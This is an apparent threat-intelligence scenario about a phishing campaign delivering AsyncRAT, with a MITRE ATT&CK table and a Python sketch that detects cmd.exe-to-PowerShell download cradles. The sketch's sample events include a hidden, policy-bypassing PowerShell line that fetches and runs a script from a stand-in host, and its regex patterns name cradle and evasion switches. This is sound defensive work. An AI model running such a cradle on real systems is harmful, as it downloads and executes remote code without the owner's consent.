Context:
This scenario describes a multi-stage phishing campaign delivering AsyncRAT, a remote access trojan, through the abuse of legitimate cloud services and script-based execution techniques.
The attack begins with phishing emails containing links to externally hosted resources, typically on trusted platforms such as Dropbox. Victims are tricked into downloading and executing a malicious shortcut (.url) file, which initiates a sequence of command-line and scripting activity involving cmd.exe and PowerShell.
The campaign leverages living-off-the-land techniques and legitimate infrastructure, such as cloud hosting and proxy services, to evade detection. Once executed, AsyncRAT enables remote control, credential harvesting, and data exfiltration through communication with attacker-controlled command-and-control servers.
MITRE ATT&CK Mapping
| Tactic | Technique ID | Technique Name | Context |
|---|---|---|---|
| Initial Access | T1566 | Phishing | The victim receives a phishing email containing a link to a malicious file hosted on a cloud service. |
| Command and Control | T1102 | Web Service | The attacker uses legitimate cloud services (e.g., Dropbox) to host and deliver malicious files. |
| Execution | T1204 | User Execution | The victim executes a malicious shortcut (.url) file, initiating the attack chain. |
| Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | The shortcut file invokes cmd.exe to start command-line execution. |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell is used to execute scripts and retrieve additional payload components. |
| Command and Control | T1105 | Ingress Tool Transfer | The AsyncRAT payload is downloaded from remote attacker-controlled infrastructure. |
| Defense Evasion | T1027 | Obfuscated Files or Information | Scripts and commands are obfuscated to evade detection. |
| Persistence | T1547 | Boot or Logon Autostart Execution | The malware establishes persistence using system startup mechanisms. |
| Credential Access | T1056 | Input Capture | AsyncRAT captures user input and collects credentials through keylogging. |
| Command and Control | T1071 | Application Layer Protocol | The compromised system communicates with attacker-controlled infrastructure over web protocols. |
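A detection sketch for the cmd.exe-to-PowerShell stage described in the scenario (T1059.003 followed by T1059.001), added here as an example and not part of the original scenario or the referenced report. It assumes the .url shortcut is launched from explorer.exe, uses Sysmon-style process-creation fields (pid, ppid, image, cmdline), and runs over constructed sample events rather than real telemetry.

```python
import re
# Constructed Sysmon-style process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -w hidden -ep bypass -c "
                "\"iwr https://example.invalid/s.ps1 | iex\""},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c "
                "\"iwr https://example.invalid/s.ps1 | iex\""},
    # Benign admin use with the same lineage; must not alert.
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -c Get-Date"},
    {"pid": 500, "ppid": 400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},
]

# Command-line markers: download cradles, in-memory evaluation, evasion switches.
INDICATORS = {
    "download": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I),
    "eval": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded": re.compile(r"(^|\s)-(enc|encodedcommand|e)\b", re.I),
    "hidden": re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.I),
    "bypass": re.compile(r"(^|\s)-(ep|executionpolicy)\s+bypass\b", re.I),
}

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events, min_indicators=2):
    """Alert on powershell.exe spawned by cmd.exe under explorer.exe (the
    assumed user-launched shortcut lineage) with enough cradle indicators."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if _basename(ev["image"]) != "powershell.exe":
            continue
        parent = by_pid.get(ev["ppid"])
        grandparent = by_pid.get(parent["ppid"]) if parent else None
        if not (parent and _basename(parent["image"]) == "cmd.exe"
                and grandparent and _basename(grandparent["image"]) == "explorer.exe"):
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(ev["cmdline"])]
        if len(hits) >= min_indicators:
            alerts.append({"pid": ev["pid"], "indicators": hits})
    return alerts
```

Requiring two or more indicators keeps ordinary scripted PowerShell out of the alert set while the hidden-window, policy-bypass and download-plus-evaluate combination still fires.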
References
Analyzing a Multi-Stage AsyncRAT Campaign via Managed Detection and Response - https://www.trendmicro.com/en_us/research/26/a/analyzing-a-a-multi-stage-asyncrat-campaign-via-mdr.html